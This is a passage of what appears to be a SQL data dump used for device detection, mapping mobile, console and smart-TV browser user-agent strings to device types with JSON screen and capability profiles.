Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":699,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; xx Note 10 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; xx Note 10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; xx Note 3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; NetCast) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/* SmartTV/5.0','smarttv','{\"type\":\"desktop\",\"markup\":\"tv\",\"screenWidth\":1920,\"screenHeight\":1080,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; NetCast) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/* SmartTV/6.0','smarttv','{\"type\":\"desktop\",\"markup\":\"tv\",\"screenWidth\":1920,\"screenHeight\":1080,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Tizen 2.4; SAMSUNG SM-Z130H) AppleWebKit/* (KHTML, like Gecko) SamsungBrowser Mobile Safari/*','tizen_mobile','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Tizen 2.4; SAMSUNG SM-Z200F) AppleWebKit/* (KHTML, like Gecko) SamsungBrowser Mobile Safari/*','tizen_mobile','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Tizen 2.4; SAMSUNG SM-Z200Y) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','tizen_mobile','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Tizen 2.4; SAMSUNG SM-Z200Y) AppleWebKit/* (KHTML, like Gecko) SamsungBrowser Mobile Safari/*','tizen_mobile','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Tizen 3.0; SAMSUNG SM-Z400Y) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','tizen_mobile','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux;Android 4.*; LG-D290) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux;Android 4.*;Lenovo A328) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux;Android 4.*;Micromax A79) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux;Android 4.*;Philips S309) AppleWebKit/* (HTML,like Gecko) Mobile Safari/*','android','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux;Android 4.*;Philips S388) AppleWebKit/* (HTML,like Gecko) Mobile Safari/*','android','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux;Android 4.*;Philips W3500) AppleWebKit/* (HTML,like Gecko) Mobile Safari/*','android','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux;Android 5.*;ZTE Blade A452) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux;Android 5.*;ZTE T320) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux;Android 5.*;ZTE T620) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (MeeGo; NokiaN9) AppleWebKit/* (KHTML, like Gecko) NokiaBrowser/* Mobile Safari/*','nokia_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Mobile; LYF/F120B/LYF-F120B-000-01-17-130318;Android) Firefox/*','jiophone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Mobile; LYF/F90M/LYF-F90M-000-02-28-130318; Android) Firefox/*','jiophone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Mobile; LYF/F90M/LYF-F90M-000-02-32-230518; Android) Firefox/*','jiophone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Mobile; LYF/LF-2403N/LYF-LF2403N-000-01-3D-120318;Android) Firefox/*','jiophone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Nintendo 3DS)','nintendo','{\"type\":\"mobile\",\"markup\":\"gameport\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Nintendo WiiU) AppleWebKit/* (KHTML, like Gecko) NX/3.0 NintendoBrowser/*','nintendo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":853,\"screenHeight\":480,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (PLAYSTATION 3 4.*) AppleWebKit/* (KHTML, like Gecko)','playstation','{\"type\":\"desktop\",\"markup\":\"gametv\",\"screenWidth\":1920,\"screenHeight\":1080,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (PlayStation Vita 3.*) AppleWebKit/* (KHTML, like Gecko) Silk','playstation','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":960,\"screenHeight\":544,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (SAMSUNG; SAMSUNG-GT-S5250; Bada/1.0) AppleWebKit/* (KHTML, like Gecko) Dolfin/2.0 Mobile WQVGA SMM-MMS/1.2 NexPlayer/3.0 profile/MIDP-2.1 configuration/CLDC-1.1 OPN-B','samsung_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":228,\"screenHeight\":360,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (SAMSUNG; SAMSUNG-GT-S5380D; Bada/2.0) AppleWebKit/* (KHTML, like Gecko) Dolfin/3.0 Mobile HVGA SMM-MMS/1.2 OPN-B','samsung_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (SAMSUNG; SAMSUNG-GT-S8530-BOUYGUES; Bada/1.2) AppleWebKit/* (KHTML, like Gecko) Dolfin/2.2 Mobile WVGA SMM-MMS/1.2 NexPlayer/3.0 profile/MIDP-2.1 configuration/CLDC-1.1 OPN-B','samsung_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (SAMSUNG; SAMSUNG-GT-S8530-VODAFONE; Bada/1.2) AppleWebKit/* (KHTML, like Gecko) Dolfin/2.2 Mobile WVGA SMM-MMS/1.2 NexPlayer/3.0 profile/MIDP-2.1 configuration/CLDC-1.1 OPN-B','samsung_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":400,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (SMART-TV; Linux; Tizen 2.3) AppleWebKit/* (KHTML, like Gecko) SamsungBrowser TV Safari/*','smarttv','{\"type\":\"desktop\",\"markup\":\"tv\",\"screenWidth\":1920,\"screenHeight\":1080,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (SMART-TV; X11; Linux armv7l) AppleWebKit/* (KHTML, like Gecko) Chromium/25.0 Chrome Safari/*','smarttv','{\"type\":\"desktop\",\"markup\":\"tv\",\"screenWidth\":1920,\"screenHeight\":1080,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Series40; Nokia302; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/* S40OviBrowser/*','nokia40','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":240,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Symbian/3; Series60/* Nokia500; Profile/MIDP-2.1 Configuration/CLDC-1.1) AppleWebKit/* (KHTML, like Gecko) NokiaBrowser/*','nokias3','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Symbian/3; Series60/* Nokia500; Profile/MIDP-2.1 Configuration/CLDC-1.1) AppleWebKit/* (KHTML, like Gecko) NokiaBrowser/* Mobile Safari/*','nokias3','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Symbian/3; Series60/* Nokia603; Profile/MIDP-2.1 Configuration/CLDC-1.1) AppleWebKit/* (KHTML, like Gecko) NokiaBrowser/* Mobile Safari/*','nokias3','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Symbian/3; Series60/* Nokia700; Profile/MIDP-2.1 Configuration/CLDC-1.1) AppleWebKit/* (KHTML, like Gecko) NokiaBrowser/* Mobile Safari/*','nokias3','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Symbian/3; Series60/* NokiaC6-01.3; Profile/MIDP-2.1 Configuration/CLDC-1.1) AppleWebKit/* (KHTML, like Gecko) NokiaBrowser/* Mobile Safari/*','nokias3','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Symbian/3; Series60/* NokiaC6-01; Profile/MIDP-2.1 Configuration/CLDC-1.1) AppleWebKit/* (KHTML, like Gecko) NokiaBrowser/*','nokias3','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Symbian/3; Series60/* NokiaC7-00; Profile/MIDP-2.1 Configuration/CLDC-1.1) AppleWebKit/* (KHTML, like Gecko) NokiaBrowser/*','nokias3','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Symbian/3; Series60/* NokiaE7-00; Profile/MIDP-2.1 Configuration/CLDC-1.1) AppleWebKit/* (KHTML, like Gecko) BrowserNG/*','nokias3','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Symbian/3; Series60/* NokiaN8-00; Profile/MIDP-2.1 Configuration/CLDC-1.1) AppleWebKit/* (KHTML, like Gecko) BrowserNG/*','nokias3','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Symbian/3; Series60/* NokiaN8-00; Profile/MIDP-2.1 Configuration/CLDC-1.1) AppleWebKit/* (KHTML, like Gecko) NokiaBrowser/* Mobile Safari/*','nokias3','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Symbian/3; Series60/* NokiaX7-00; Profile/MIDP-2.1 Configuration/CLDC-1.1) AppleWebKit/* (KHTML, like Gecko) NokiaBrowser/* Mobile Safari/*','nokias3','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (SymbianOS/*; Series60/* Nokia5228; Profile/MIDP-2.1 Configuration/CLDC-1.1) AppleWebKit/* (KHTML, like Gecko) NokiaBrowser/*','nokia60','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (SymbianOS/*; Series60/* Nokia5228; Profile/MIDP-2.1 Configuration/CLDC-1.1) AppleWebKit/* (KHTML, like Gecko) NokiaBrowser/* Mobile Safari/*','nokia60','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (SymbianOS/*; Series60/* Nokia5800d-1; Profile/MIDP-2.1 Configuration/CLDC-1.1) AppleWebKit/* (KHTML, like Gecko) BrowserNG/*','nokia60','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (SymbianOS/*; Series60/* Nokia5800d-1; Profile/MIDP-2.1 Configuration/CLDC-1.1) AppleWebKit/* (KHTML, like Gecko) NokiaBrowser/*','nokia60','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (SymbianOS/*; Series60/* Nokia5800d-1; Profile/MIDP-2.1 Configuration/CLDC-1.1) AppleWebKit/* (KHTML, like Gecko) Safari/*','nokia60','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (SymbianOS/*; Series60/* NokiaC5-00.2; Profile/MIDP-2.1 Configuration/CLDC-1.1) AppleWebKit/* (KHTML, like Gecko) NokiaBrowser/*','nokia60','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (SymbianOS/*; Series60/* NokiaC5-00; Profile/MIDP-2.1 Configuration/CLDC-1.1) AppleWebKit/* (KHTML, like Gecko) NokiaBrowser/*','nokia60','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (SymbianOS/*; Series60/* NokiaC5-06; Profile/MIDP-2.1 Configuration/CLDC-1.1) AppleWebKit/* (KHTML, like Gecko) NokiaBrowser/*','nokia60','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (SymbianOS/*; Series60/* NokiaC6-00; Profile/MIDP-2.1 Configuration/CLDC-1.1) AppleWebKit/* (KHTML, like Gecko) NokiaBrowser/*','nokia60','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (SymbianOS/*; Series60/* NokiaE5-00; Profile/MIDP-2.1 Configuration/CLDC-1.1) AppleWebKit/* (KHTML, like Gecko) BrowserNG/*','nokia60','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":240,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (SymbianOS/*; Series60/* NokiaE52-1; Profile/MIDP-2.1 Configuration/CLDC-1.1) AppleWebKit/* (KHTML, like Gecko) BrowserNG/*','nokia60','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (SymbianOS/*; Series60/* NokiaE63-2; Profile/MIDP-2.0 Configuration/CLDC-1.1) AppleWebKit/* (KHTML, like Gecko) Safari/*','nokia60','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":240,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (SymbianOS/*; Series60/* NokiaE63; Profile/MIDP-2.0 Configuration/CLDC-1.1) AppleWebKit/* (KHTML, like Gecko) Safari/*','nokia60','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":240,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (SymbianOS/*; Series60/* NokiaE66-1; Profile/MIDP-2.0 Configuration/CLDC-1.1) AppleWebKit/* (KHTML, like Gecko) Safari/*','nokia60','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":234,\"screenHeight\":300,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (SymbianOS/*; Series60/* NokiaE71-1; Profile/MIDP-2.0 Configuration/CLDC-1.1) AppleWebKit/* (KHTML, like Gecko) Safari/*','nokia60','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":240,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (SymbianOS/*; Series60/* NokiaE72-1; Profile/MIDP-2.1 Configuration/CLDC-1.1) AppleWebKit/* (KHTML, like Gecko) BrowserNG/*','nokia60','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":240,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (SymbianOS/*; Series60/* NokiaE72-1; Profile/MIDP-2.1 Configuration/CLDC-1.1) AppleWebKit/* (KHTML, like Gecko) NokiaBrowser/*','nokia60','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":240,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (SymbianOS/*; Series60/* NokiaE72-1; Profile/MIDP-2.1 Configuration/CLDC-1.1) AppleWebKit/* (KHTML, like Gecko) NokiaBrowser/* Mobile Safari/*','nokia60','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":240,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (SymbianOS/*; Series60/* NokiaE90-1; Profile/MIDP-2.0 Configuration/CLDC-1.1) AppleWebKit/* (KHTML, like Gecko) Safari/*','nokia60','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":800,\"screenHeight\":352,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (SymbianOS/*; Series60/* NokiaN81-3; Profile/MIDP-2.0 Configuration/CLDC-1.1) AppleWebKit/* (KHTML, like Gecko) Safari/*','nokia60','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (SymbianOS/*; Series60/* NokiaN95; Profile/MIDP-2.0 Configuration/CLDC-1.1) AppleWebKit/* (KHTML, like Gecko) Safari/*','nokia60','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (SymbianOS/*; Series60/* NokiaN95_8GB; Profile/MIDP-2.0 Configuration/CLDC-1.1) AppleWebKit/* (KHTML, like Gecko) Safari/*','nokia60','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (SymbianOS/*; Series60/* NokiaN97-1; Profile/MIDP-2.1 Configuration/CLDC-1.1) AppleWebKit/* (KHTML, like Gecko) BrowserNG/*','nokia60','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (SymbianOS/9.1) AppleWebKit/* (KHTML, like Gecko) Safari/*','','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":229,\"screenHeight\":260,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (SymbianOS/9.1) AppleWebKit/* (KHTML, like Gecko) Safari/* es70','','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":346,\"screenHeight\":380,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/* (KHTML, like Gecko) PhantomJS/1.9 Safari/*','bot','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":398,\"screenHeight\":299,\"pixelRatio\":2.56666666667,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Windows Phone 10.0; Android 4.*; Microsoft; Lumia 535 Dual SIM) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Windows Phone 10.0; Android 4.*; Microsoft; Lumia 550) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Windows Phone 10.0; Android 4.*; Microsoft; Lumia 640 LTE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Windows Phone 10.0; Android 4.*; Microsoft; Lumia 640 XL LTE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":480,\"screenHeight\":853,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Windows Phone 10.0; Android 6.*; Microsoft; Lumia 430 Dual SIM) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Windows Phone 10.0; Android 6.*; Microsoft; Lumia 435 Dual SIM) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Windows Phone 10.0; Android 6.*; Microsoft; Lumia 435) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Windows Phone 10.0; Android 6.*; Microsoft; Lumia 532 Dual SIM) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Windows Phone 10.0; Android 6.*; Microsoft; Lumia 535 Dual SIM) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 